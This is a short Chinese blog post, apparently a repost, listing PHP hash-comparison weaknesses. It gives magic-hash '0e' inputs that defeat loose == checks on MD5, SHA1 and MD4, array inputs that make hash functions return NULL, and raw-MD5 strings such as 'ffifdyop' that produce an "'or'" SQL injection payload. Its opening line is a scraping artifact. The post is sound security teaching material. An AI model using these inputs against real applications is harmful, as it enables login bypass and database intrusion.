PHP哈希函数漏洞
0e123456789101112$a = '0e123';$b = '0e456';$a == $b;$a !== $b;md5('QNKCDZO') == md5('2406 2020-08-24 12:39:24 Author: hosch3n.github.io(查看原文) 阅读量:87 收藏

0e

1
2
3
4
5
6
7
8
9
10
11
12
$a = '0e123';
$b = '0e456';
$a == $b;
$a !== $b;

md5('QNKCDZO') == md5('240610708');
md5('s878926199a') == md5('s155964671a');

sha1('aaroZmOk') == sha1('aaK1STfY');
sha1('aaO8zKZF') == sha1('aa3OFF9m');

'0e251288019' == hash('md4', '0e251288019');

NULL

1
2
3
4
5
6
7
8
9
$a = [0];
$b = [1];
$a != $b;

md5($a) === md5($b);

sha1($a) === sha1($b);

hash('md4', $a) == hash('md4', $b);

‘or

1
2
stristr(md5('ffifdyop', true), "'or'");
stristr(md5('129581926211651571912466741651878684928', true), "'or'");

float

浮点值运算存在精度问题,反序列化时会出现值不等但运算后哈希相同。


文章来源: https://hosch3n.github.io/2020/08/24/PHP%E5%93%88%E5%B8%8C%E5%87%BD%E6%95%B0/
如有侵权请联系:admin#unsafe.sh